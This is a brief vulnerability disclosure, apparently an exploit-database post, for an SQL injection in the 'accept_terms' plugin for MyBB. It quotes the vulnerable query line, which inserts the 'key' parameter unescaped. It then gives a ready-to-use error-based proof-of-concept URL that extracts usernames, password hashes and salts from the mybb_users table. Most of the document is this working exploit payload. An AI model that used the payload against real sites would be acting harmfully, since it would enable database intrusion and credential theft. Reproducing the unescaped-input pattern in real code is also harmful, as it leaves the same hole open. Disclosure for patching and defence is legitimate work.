SQL Injection
=============
-------------[/inc/plugins/accept_terms.php]-------------
//L.80
1$query = $db->simple_select("accept_terms", "*", "verified='0' AND `key`='{$mybb->input['key']}' AND uid='{$mybb->user['uid']}'");
-------------[/inc/plugins/accept_terms.php]-------------
Proof of concept
================
Error based :
http://[site]/index.php?action=agree&key=%27%20union%20select%201,2,3,%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20from%20mybb_users%20limit%201%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29,5,6--%20-
Groucho